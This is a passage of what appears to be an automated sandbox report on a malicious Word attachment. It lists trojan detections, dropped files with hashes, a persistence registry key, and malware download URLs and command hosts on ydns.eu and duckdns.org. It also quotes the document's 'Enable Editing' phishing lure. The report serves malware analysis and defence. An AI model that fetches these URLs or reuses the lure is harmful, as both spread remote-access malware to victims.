        C:\Program Files\Microsoft DN1\sqlmap.dll | 43% | ReversingLabs | Win64.Trojan.RDPWrap
        C:\ProgramData\images.exe | 28% | ReversingLabs |
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe | 20% | ReversingLabs | ByteCode-MSIL.Backdoor.Remcos
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe | 28% | ReversingLabs |
        C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | 20% | ReversingLabs | ByteCode-MSIL.Backdoor.Remcos
        C:\Users\user\AppData\Roaming\putty.exe | 28% | ReversingLabs |
        C:\Windows\System32\rfxvmt.dll | 0% | Metadefender |
        C:\Windows\System32\rfxvmt.dll | 0% | ReversingLabs |

        Unpacked PE Files

        Source | Detection | Scanner | Label
        21.2.images.exe.400000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2
        15.2.putty.exe.400000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2
        34.2.iBCrDCK.i.exe.400000.2.unpack | 100% | Avira | TR/Dropper.Gen
        34.2.iBCrDCK.i.exe.440000.4.unpack | 100% | Avira | TR/NanoCore.fadte
        13.2.putty.exe.400000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2

        Domains

        No Antivirus matches

        URLs

        Source | Detection | Scanner | Label
        http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
        http://newhosteeeee.ydns.eu | 0% | Avira URL Cloud | safe
        http://hutyrtit.ydns.eu/microC.exe | 100% | Avira URL Cloud | malware
        httP://newhosteeeee.ydns.eu/putty.exePE | 0% | Avira URL Cloud | safe
        httP://newhosteeeee.ydns.eu/putty.exe | 0% | Avira URL Cloud | safe
        http://ja.com/ | 0% | Avira URL Cloud | safe
        http://java.co | 0% | Avira URL Cloud | safe
        http://www.%s.comPA | 0% | URL Reputation | safe
        http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
        httP://newhosteeeee.ydns.eu/p | 0% | Avira URL Cloud | safe
        httP://newhosteeeee.ydns.eu/putt | 0% | Avira URL Cloud | safe

        Domains and IPs

        Contacted Domains

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        newhosteeeee.ydns.eu | 203.159.80.186 | true | false |  | high
        sdafsdffssffs.ydns.eu | 203.159.80.186 | true | false |  | high
        hutyrtit.ydns.eu | 203.159.80.165 | true | false |  | high
        hhjhtggfr.duckdns.org | 203.159.80.186 | true | false |  | high

                Contacted URLs

                Name | Malicious | Antivirus Detection | Reputation
                http://hutyrtit.ydns.eu/microC.exe | true | Avira URL Cloud: malware | unknown
                http://newhosteeeee.ydns.eu/putty.exe | true |  | unknown

                  URLs from Memory and Binaries

                  Name | Source | Malicious | Antivirus Detection | Reputation
                  http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmp | false |  | high
                  http://www.icra.org/vocabulary/. | notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000003.00000002.2095131637.0000000002310000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2099882416.0000000002420000.00000002.00000001.sdmp | false |  | high
                  http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | powershell.exe, 00000003.00000002.2094491159.00000000001CC000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmp | false |  | high
                  http://newhosteeeee.ydns.eu | powershell.exe, 00000003.00000002.2103127329.0000000003709000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2111053200.00000000036C9000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                  http://www.piriform.com/ccleaner. | powershell.exe, 00000003.00000002.2094474663.000000000019E000.00000004.00000020.sdmp | false |  | high
                  httP://newhosteeeee.ydns.eu/putty.exePE | powershell.exe, 00000003.00000002.2101696206.000000000360C000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2109600442.00000000035CC000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
                  httP://newhosteeeee.ydns.eu/putty.exe | powershell.exe, 00000006.00000002.2096371882.000000000036E000.00000004.00000020.sdmp | true | Avira URL Cloud: safe | unknown
                  http://ja.com/ | powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
                  http://java.co | powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
                  http://www.piriform.com/ccleaner | powershell.exe, 00000003.00000002.2094491159.00000000001CC000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmp | false |  | high
                  http://www.%s.comPA | powershell.exe, 00000003.00000002.2095131637.0000000002310000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2099882416.0000000002420000.00000002.00000001.sdmp | false | URL Reputation: safe | low
                  http://windowsmedia.com/redir/services.asp?WMPFriendly=true | notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
                  https://github.com/syohex/java-simple-mine-sweeperC: | putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp | false |  | high
                  httP://newhosteeeee.ydns.eu/p | powershell.exe, 00000003.00000002.2103127329.0000000003709000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
                  https://github.com/syohex/java-simple-mine-sweeper | putty.exe, images.exe | false |  | high
                  httP://newhosteeeee.ydns.eu/putt | powershell.exe, 00000003.00000002.2101696206.000000000360C000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2109600442.00000000035CC000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown

                                Contacted IPs


                                Public

                                IP | Domain | Country | ASN | ASN Name | Malicious
                                203.159.80.186 | newhosteeeee.ydns.eu | Netherlands | 47987 | LOVESERVERSGB | false
                                203.159.80.165 | hutyrtit.ydns.eu | Netherlands | 47987 | LOVESERVERSGB | false

                                General Information

                                Joe Sandbox Version: 33.0.0 White Diamond
                                Analysis ID: 457815
                                Start date: 02.08.2021
                                Start time: 10:59:02
                                Joe Sandbox Product: CloudBasic
                                Overall analysis duration: 0h 14m 35s
                                Hypervisor based Inspection enabled: false
                                Report type: full
                                Sample file name: NEW PO1100372954 -.doc
                                Cookbook file name: defaultwindowsofficecookbook.jbs
                                Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                Number of new started processes analysed: 33
                                Number of new started drivers analysed: 4
                                Number of existing processes analysed: 0
                                Number of existing drivers analysed: 0
                                Number of injected processes analysed: 0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode: default
                                Analysis stop reason: Timeout
                                Detection: MAL
                                Classification: mal100.phis.troj.spyw.expl.evad.winDOC@45/31@24/2
                                EGA Information: Failed
                                HDC Information:
                                • Successful, ratio: 50.5% (good quality ratio 49.5%)
                                • Quality average: 87.6%
                                • Quality standard deviation: 20.8%
                                HCA Information:
                                • Successful, ratio: 99%
                                • Number of executed functions: 336
                                • Number of non-executed functions: 226
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .doc
                                • Found Word or Excel or PowerPoint or XPS Viewer
                                • Attach to Office via COM
                                • Active ActiveX Object
                                • Scroll down
                                • Close Viewer
                                Warnings:
                                • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                                • Not all processes were analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtCreateFile calls found.
                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                • Report size getting too big, too many NtEnumerateValueKey calls found.
                                • Report size getting too big, too many NtOpenFile calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.
                                • VT rate limit hit for: /opt/package/joesandbox/database/analysis/457815/sample/NEW PO1100372954 -.doc

                                Simulations

                                Behavior and APIs

                                Time | Type | Description
                                10:59:41 | API Interceptor | 69x Sleep call for process: powershell.exe modified
                                10:59:50 | API Interceptor | 19x Sleep call for process: putty.exe modified
                                10:59:59 | API Interceptor | 1204x Sleep call for process: images.exe modified
                                11:00:13 | API Interceptor | 709x Sleep call for process: cmd.exe modified
                                11:00:16 | API Interceptor | 983x Sleep call for process: iBCrDCK.i.exe modified
                                11:00:23 | API Interceptor | 37x Sleep call for process: drvinst.exe modified
                                11:00:39 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SMTP Service C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                11:00:49 | API Interceptor | 140x Sleep call for process: smtpsvc.exe modified

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASN

                                No context

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                Process:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):0
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:24576:26IBQ76DOifx8Dgyfx8Dgz06TbTZpq72pMNaDuDHQUl3uwDZzGL:OQ76f58Dgy58Dgz06n1pfWNdlJZa
                                MD5:8FA8F52DFC55D341300EFF8E4C44BA33
                                SHA1:4FBDB8C39BBC48B159E1F795A2222D51077FDBE9
                                SHA-256:2C7DA7FF43C90AE620FD5135C2ED34C7E644A9A1098BFB69F1DC6B8AB6410C9A
                                SHA-512:A29B2B8FCDE4EF5917E6AAD29C547D2FCEF3E452B3ED502788BD5BF7CB2E107C46A12783EBBE8EB4AA896C56DFD3FD37C994B67EB5C8F5C9C32FBA75FE486205
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 20%
                                Reputation:unknown
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..a..............P..............L... ...`....@.. .......................`............@..................................K..O....`.. ....................@....................................................... ............... ..H............text....,... ...................... ..`.rsrc... ....`.......0..............@..@.reloc.......@......................@..B.................K......H........0..d.......s........o............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r1..p~....o-...(......t$....+..*...0..&........(....r7..p~....o-...(......
                                C:\Program Files\Microsoft DN1\rdpwrap.ini
                                Process:C:\ProgramData\images.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):181846
                                Entropy (8bit):5.421809355655133
                                Encrypted:false
                                SSDEEP:768:WEUfQYczxEQBLWf9PUupBdfbQnxJcRZsMFdKlax8Rr/d6gl/+f8jZ0fyL+8F7f6/:57f6GqZm0c11IvimstYUWtN/7
                                MD5:6BC395161B04AA555D5A4E8EB8320020
                                SHA1:F18544FAA4BD067F6773A373D580E111B0C8C300
                                SHA-256:23390DFCDA60F292BA1E52ABB5BA2F829335351F4F9B1D33A9A6AD7A9BF5E2BE
                                SHA-512:679AC80C26422667CA5F2A6D9F0E022EF76BC9B09F97AD390B81F2E286446F0658524CCC8346A6E79D10E42131BC428F7C0CE4541D44D83AF8134C499436DAAE
                                Malicious:false
                                Reputation:unknown
                                Preview: ; RDP Wrapper Library configuration..; Do not modify without special knowledge....[Main]..Updated=2020-08-25..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[PatchCodes]..nop=90..Zero=00..jmpshort=EB..nopjmp=90E9..CDefPolicy_Query_edx_ecx=BA000100008991200300005E90..CDefPolicy_Query_eax_rcx_jmp=B80001000089813806000090EB..CDefPolicy_Query_eax_esi=B80001000089862003000090..CDefPolicy_Query_eax_rdi=B80001000089873806000090..CDefPolicy_Query_eax_ecx=B80001000089812003000090..CDefPolicy_Query_eax_ecx_jmp=B800010000898120030000EB0E..CDefPolicy_Query_eax_rcx=B80001000089813806000090..CDefPolicy_Query_edi_rcx=BF0001000089B938060000909090....[SLInit]..bServerSku=1..bRemoteConnAllowed=1..bFUSEnabled=1..bAppServerAllowed=1..bMultimonAllowed=1..lMaxUserSessions=0..ulMaxDebugSessions=0..bInitialized=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionM
                                C:\Program Files\Microsoft DN1\sqlmap.dll
                                Process:C:\ProgramData\images.exe
                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                Category:dropped
                                Size (bytes):116736
                                Entropy (8bit):5.884975745255681
                                Encrypted:false
                                SSDEEP:3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
                                MD5:461ADE40B800AE80A40985594E1AC236
                                SHA1:B3892EEF846C044A2B0785D54A432B3E93A968C8
                                SHA-256:798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                                SHA-512:421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
                                Malicious:true
                                Antivirus:
                                • Antivirus: Metadefender, Detection: 20%, Browse
                                • Antivirus: ReversingLabs, Detection: 43%
                                Reputation:unknown
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................
                                C:\ProgramData\images.exe
                                Process:C:\Users\user\AppData\Roaming\putty.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):731648
                                Entropy (8bit):7.501590274865465
                                Encrypted:false
                                SSDEEP:12288:hdJnZDHQg/eZ0EaMEH+a2C9mIzUewRTCABR4x9kB3AHwmV2h1mFbiwN2:Pw05H+NC9mIzUewRTC0Ui3APmY
                                MD5:0CFE251E0B61BBC87656F52DEFAD4C53
                                SHA1:D7126889DC5FFCF23C90FFA19A359060658A0388
                                SHA-256:DB531D6E969F16A9318224E16A18F3314FA75D0EAAD90FC9A805F10D098D67C9
                                SHA-512:85E15BF86BC62B9AE552FAC7118A9F54631BA84FDF60ACB803348813B67E0B4349F82FBF312474879C3DC209E06EC21E8BFACEDF91CA2D3B490270F655BF980D
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 28%
                                Reputation:unknown
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F..a..............P.. ..........z;... ...@....@.. ....................................@.................................(;..O....@.......................`....................................................... ............... ..H............text...`.... ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B................\;......H........................... w...........................................0............(+...(,.........(.....o-....*.....................(.......(/......(0......(1......(2....*N..(....o....(3....*&..(4....*.s5........s6........s7........s8........s9........*....0...........~....o:....+..*.0...........~....o;....+..*.0...........~....o<....+..*.0...........~....o=....+..*.0...........~....o>....+..*.0..<........~.....(?.....,!r...p.....(@...oA...sB............~.....+..*.0......
                                C:\Users\user\AppData\Local\Microsoft Vision\02-08-2021_11.00.14
                                Process:C:\ProgramData\images.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):118
                                Entropy (8bit):3.2566267151938755
                                Encrypted:false
                                SSDEEP:3:ilsVeJ7lfo0eF2PNylRflyQHAnyWdl+SliXln:ilKSNombQgyWn+Sk1
                                MD5:9DD34F139B8B7D0FC865CDE6027043FB
                                SHA1:F9098E55DD0B2F83C8C58E117804F12DCAEA8D93
                                SHA-256:96BE75D129E470DEEBADA5AD99013E91F0454306B24650A6BC043C1B22A40D46
                                SHA-512:7031A0A6EE90FB6C9725232BEF9EE93574E8DC6A77B0DECBC3EF2B7FBB23966E5F3C0BCF1AD30C1892B9E8437377A893201B8E10B94763EB34477D13BAD2A121
                                Malicious:false
                                Reputation:unknown
                                Preview: ..{.i.m.g.s. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.}...L.e.f.t. .W.i.n.d.o.w.s.r.
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe
                                Process:C:\ProgramData\images.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:downloaded
                                Size (bytes):1378816
                                Entropy (8bit):7.548476087877472
                                Encrypted:false
                                SSDEEP:24576:26IBQ76DOifx8Dgyfx8Dgz06TbTZpq72pMNaDuDHQUl3uwDZzGL:OQ76f58Dgy58Dgz06n1pfWNdlJZa
                                MD5:8FA8F52DFC55D341300EFF8E4C44BA33
                                SHA1:4FBDB8C39BBC48B159E1F795A2222D51077FDBE9
                                SHA-256:2C7DA7FF43C90AE620FD5135C2ED34C7E644A9A1098BFB69F1DC6B8AB6410C9A
                                SHA-512:A29B2B8FCDE4EF5917E6AAD29C547D2FCEF3E452B3ED502788BD5BF7CB2E107C46A12783EBBE8EB4AA896C56DFD3FD37C994B67EB5C8F5C9C32FBA75FE486205
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 20%
                                Reputation:unknown
                                IE Cache URL:http://hutyrtit.ydns.eu/microC.exe
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..a..............P..............L... ...`....@.. .......................`............@..................................K..O....`.. ....................@....................................................... ............... ..H............text....,... ...................... ..`.rsrc... ....`.......0..............@..@.reloc.......@......................@..B.................K......H........0..d.......s........o............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r1..p~....o-...(......t$....+..*...0..&........(....r7..p~....o-...(......
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:downloaded
                                Size (bytes):731648
                                Entropy (8bit):7.501590274865465
                                Encrypted:false
                                SSDEEP:12288:hdJnZDHQg/eZ0EaMEH+a2C9mIzUewRTCABR4x9kB3AHwmV2h1mFbiwN2:Pw05H+NC9mIzUewRTC0Ui3APmY
                                MD5:0CFE251E0B61BBC87656F52DEFAD4C53
                                SHA1:D7126889DC5FFCF23C90FFA19A359060658A0388
                                SHA-256:DB531D6E969F16A9318224E16A18F3314FA75D0EAAD90FC9A805F10D098D67C9
                                SHA-512:85E15BF86BC62B9AE552FAC7118A9F54631BA84FDF60ACB803348813B67E0B4349F82FBF312474879C3DC209E06EC21E8BFACEDF91CA2D3B490270F655BF980D
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 28%
                                Reputation:unknown
                                IE Cache URL:http://newhosteeeee.ydns.eu/putty.exe
                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F..a..............P.. ..........z;... ...@....@.. ....................................@.................................(;..O....@.......................`....................................................... ............... ..H............text...`.... ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B................\;......H........................... w...........................................0............(+...(,.........(.....o-....*.....................(.......(/......(0......(1......(2....*N..(....o....(3....*&..(4....*.s5........s6........s7........s8........s9........*....0...........~....o:....+..*.0...........~....o;....+..*.0...........~....o<....+..*.0...........~....o=....+..*.0...........~....o>....+..*.0..<........~.....(?.....,!r...p.....(@...oA...sB............~.....+..*.0......
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\11DB366A.png
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:370 sysV pure executable
                                Category:dropped
                                Size (bytes):262160
                                Entropy (8bit):0.0018414541227182795
                                Encrypted:false
                                SSDEEP:3:8aB/lYv2Hblll5l/lHd/lXF4/:zBav27K/
                                MD5:36148DAEC9FF9C3487586B72447DAC7B
                                SHA1:FEE4FB27C45CE43BDB41BA190FDC11704EC3EA54
                                SHA-256:E3AC1E0A5DD46E9D605470CBB3C427582A180024754595370A1BCA98031BA426
                                SHA-512:E41BFECCD86CE8DCCDBCAF3B4068A7D328D91AAB035468201169817660EB539816FA4AD9BB5E60D828C421755D01680B8AD0BA0E6C395973AFFDBDAAEA5D11FD
                                Malicious:false
                                Reputation:unknown
                                Preview: X.&.......f.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9029FF63.wmf
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\005"
                                Category:dropped
                                Size (bytes):3730
                                Entropy (8bit):5.027033050759854
                                Encrypted:false
                                SSDEEP:48:5Wik/UKHl3G6nj6rmbYf3LSrd/lO88e0f5aSdJ9nNk3t1fo:Jk7Hgwj+mbYf3LSrhlOs0f5aSdHn63DA
                                MD5:5648227A1DC795BD5B4961DAD493E795
                                SHA1:1611B47CE3F0AD0D19EEE0E27AB2CF3A8190B0D7
                                SHA-256:200124261ED676F6C2D812191655E2EC735897137E93ED676BD22AD6E455FC7A
                                SHA-512:3714019501B872EC8D514909F21108611A79C65C204C8251F01338CDDF76CB32BFDB2BB1CF3545E0A1D1D88549954F5F7999B9EE05A053FF73E323560B4FFB14
                                Malicious:false
                                Reputation:unknown
                                Preview: ..................................5...........................Segoe UI....C......@...............-...........................A..... . ..... . ...7.(... ...@.............................................................................................................................................................................................................................................................................................?.........!...A.F.f. . ..... . ...7.(... ... ................................................................................................................................................................................................................................................................................................................................G .>..:..9..8..8..8..9..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:..:.i2........K..S(.O$.N!.N!.N!.N!.N".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".M".N".M".M".O$.S).O".......l
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2631CAF7-C3D4-4848-8C82-E142953DDA5E}.tmp
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):44618
                                Entropy (8bit):2.916482234929812
                                Encrypted:false
                                SSDEEP:768:Dr/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:nFia0Dqeb0nstw29rVzWSgm58F
                                MD5:CFD90F1E4A07FBF4850CB646C76C0AC9
                                SHA1:E9692ED21B6AFE1B5D587ECA5A20330676ED3325
                                SHA-256:0989F417091A5262338DEACB63FA9D9129741D9C862B67E6F8060DB43E67BAAE
                                SHA-512:53383F93D07DDE48873F5CA2069F1F653723B20BC7BC51C78530B628764243C2622E54C0545D83D14AEAC0521F018EBE490A20F1DB63446EA70943871A541A86
                                Malicious:false
                                Reputation:unknown
                                Preview: c.0.5.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .d.o.e.s. .n.o.t. .w.o.r.k. .i.n. .e.m.a.i.l. .P.r.e.v.i.e.w.....P.l.e.a.s.e. .d.o.w.n.l.o.a.d. .t.h.e. .d.o.c.u.m.e.n.t. .a.n.d. .c.l.i.c.k. .E.n.a.b.l.e. .E.d.i.t.i.n.g. .w.h.e.n. .o.p.e.n.i.n.g.......=......... .P.a.c.k.a.g.e.E.M.B.E.D.W.o.r.d...D.o.c.u.m.e.n.t...8.........=....... .\.a. .W.o.r.d...D.o.c.u.m.e.n.t...8. .".%.T.M.P.%.\.\.a.b.d.t.f.h.g.h.g.d.g.h.g.h.....S.C.T.". .".e.w.:.{.0.0.0.0.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.0.0.0.0.0.0.0.0.}.".....................................4...>...D.................................................................................................................................................................................................................................................................................................................CJ..OJ..QJ..^J..aJ.....j....CJ..OJ..QJ..U..^J..aJ.. .j.N.d...CJ..OJ..QJ..U..^J..aJ.....h.CK.5..CJ..OJ..QJ..^J..aJ....h.CK.CJ..OJ..QJ..^J..aJ.
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CEE3E709-76F5-433D-BD56-9523C4C9DC31}.tmp
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):1536
                                Entropy (8bit):1.3573187972516119
                                Encrypted:false
                                SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlb3:IiiiiiiiiifdLloZQc8++lsJe1MzK/
                                MD5:CD4DCADB7EAF8EBC3C0D123D947A31DC
                                SHA1:37AFAD9A59B5EF6715E976B43C141DA08A1758A5
                                SHA-256:0AA54F5023AB6361CC2ACD4C28F082149BA87BDC042BA7374CD02AFCAA01B5F1
                                SHA-512:30B40C28DCDED02E8FFCE1BF40777B76D904C1EC1D2D5DFD3E18BB3B783E6CD8B6AD76D9733ACF32E2FD01140AF54FF134FBE10F5615407E8B078BAC093E82CB
                                Malicious:false
                                Reputation:unknown
                                Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E195593A-72A2-4470-89E8-B7D87A58E0E0}.tmp
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):1024
                                Entropy (8bit):0.05390218305374581
                                Encrypted:false
                                SSDEEP:3:ol3lYdn:4Wn
                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                Malicious:false
                                Reputation:unknown
                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Local\Temp\OICE_9306262C-FECE-4A9E-949D-FCC308D5F5A8.0\FLD93F.tmp
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:370 sysV pure executable
                                Category:dropped
                                Size (bytes):262160
                                Entropy (8bit):0.0018414541227182795
                                Encrypted:false
                                SSDEEP:3:8aB/lYv2Hblll5l/lHd/lXF4/:zBav27K/
                                MD5:36148DAEC9FF9C3487586B72447DAC7B
                                SHA1:FEE4FB27C45CE43BDB41BA190FDC11704EC3EA54
                                SHA-256:E3AC1E0A5DD46E9D605470CBB3C427582A180024754595370A1BCA98031BA426
                                SHA-512:E41BFECCD86CE8DCCDBCAF3B4068A7D328D91AAB035468201169817660EB539816FA4AD9BB5E60D828C421755D01680B8AD0BA0E6C395973AFFDBDAAEA5D11FD
                                Malicious:false
                                Reputation:unknown
                                Preview: X.&.......f.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):20480
                                Entropy (8bit):5.821101833795217
                                Encrypted:false
